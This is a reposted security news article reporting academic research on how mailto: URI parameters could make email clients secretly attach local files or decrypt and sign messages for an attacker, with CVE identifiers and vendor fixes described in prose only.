An evaluation shows that 8 out of 20 tested email clients are vulnerable to at least one attack, the researchers found. More specifically, five out of 18 OpenPGP-capable email clients and six out of 18 S/MIME-capable clients were vulnerable to at least one attack.

The researchers were also able to abuse the mailto: URI method, which allows third-party applications to open a separate email client to compose a message, to secretly attach local files to email messages and sent to an attackers address. The mailto method is often used on websites, where clicking on a link can launch the locally installed email client with the recipient field (To) pre-populated with the email address the message is going to. It is possible to pre-populate other fields, such as a subject line and even the body of the message.

The issue lies in how email clients implemented RFC6068, the technical standard describing mailto. The researchers found that several standard parameters the mailto URI passes to the email client could be abused to trick the email client into decrypting ciphertext messages, or signing messages and sending them to attackers, the researchers said. One example of this is how the mailto method uses the attach or attachment parameters to open up an email window with a file already attached. If the user does not notice that the email window has the file attached, the user could inadvertently send sensitive information such as encryption (PGP) keys, SSH private keys, configuration files, and other sensitive information.

Researcher Mller posted a video on Twitter illustrating how mailto parameters could be abused. The researchers were able to perform this attack on four of the tested clients.

The researchers were able to attach files by knowing the exact file paths for the desired files, using wildcard characters to attach multiple files in a given location, or using URLs pointing to internal network shares. They were also able to use IMAP links to steal email messages from a user's IMAP email inbox.

The vulnerabilities have been reported to the affected vendors back in February. The list includes IBM/HCL Notes (CVE-2020-4089), GNOME Evolution (CVE-2020-11879), and KDE KMail (CVE-2020-11880). The details for CVE-2020-12618, and CVE-2020-12619 have not been made public. Thunderbird versions 52 and 60 for Debian/Kali Linux were affected as they had problems with the mailto parameter allowing local files (such as an SSH private key) to be attached to outgoing messages. Recent versions of Thunderbird are not vulnerable, as the issue with the mailto?attach= parameter was fixed in Thunderbird last year.

While our attacks do not target the underlying cryptographic primitives, they raise concerns about the practical security of OpenPGP and S/MIME email applications, the researchers wrote.

Visit link:
Researchers Develop Attacks Targeting End-to-End Encryption in Emails - Decipher